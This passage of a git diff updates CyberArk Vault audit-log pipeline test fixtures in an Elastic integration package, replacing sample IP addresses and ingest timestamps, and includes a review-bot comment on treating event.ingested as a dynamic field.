Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json
index f7421893ce7..065f1158bff 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json
@@ -21,7 +21,7 @@
 },
 "@timestamp": "2021-03-15T12:57:13.000Z",
 "file": {
- "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart"
+ "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart"
 },
 "ecs": {
 "version": "1.12.0"
@@ -38,22 +38,22 @@ "cyberarkpas": { "audit": { "severity": "Error", - "reason": "MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-15T12:57:13Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e130\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e130\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Disable Password", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "5", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + 
"address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -65,9 +65,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615813031", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Disable Password", 
@@ -81,8 +81,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:28.504981Z", - "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e130\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"130\",\"Desc\":\"CPM Disable Password\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Disable Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Disable Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:37.558992Z", + "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n 
\u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e130\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"130\",\"Desc\":\"CPM Disable Password\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Disable Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Disable Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "130", "kind": "event", "action": "cpm disable password", 
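Review bot: The regenerated `"ingested": "2021-12-09T13:36:37.558992Z"` in this hunk is an ingest-time artefact rather than a property of the input, so the expected file will change on every regeneration and the intended IP update is buried under timestamp churn; the test-178 hunk below has the same `ingested` rewrite. If the package's pipeline test config does not already exclude it, declaring the field dynamic there, `dynamic_fields:` followed by `event.ingested: ".*"`, keeps these fixtures stable across regenerations. The `original` string also carries a third copy of the raw payload (after `cyberarkpas.audit.raw` and the top-level `raw` in the preceding hunk), so any future change to the sample address or hostname has to be applied to all three copies or the pipeline test will drift.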
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json
index c1b0d793e2a..aa9a17269aa 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json
@@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:28.561257100Z", + "ingested": "2021-12-09T13:36:37.727184900Z", "original": "\u003c7\u003e1 2021-03-11T18:45:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:45:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:45:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e178\u003c/MessageID\u003e\\n \u003cDesc\u003eGet User's Details\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eGet User's Details\u003c/Action\u003e\\n \u003cSourceUser\u003eMaster\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGet User's Details\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:45:23\",\"IsoTimestamp\":\"2021-03-11T18:45:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"178\",\"Desc\":\"Get User's Details\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Get User's 
Details\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Get User's Details\",\"GatewayStation\":\"\"}}}",
 "code": "178",
 "kind": "event",
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log
index 78ec9f57fe6..e9e3529abd7 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log
@@ -1,12 +1,12 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
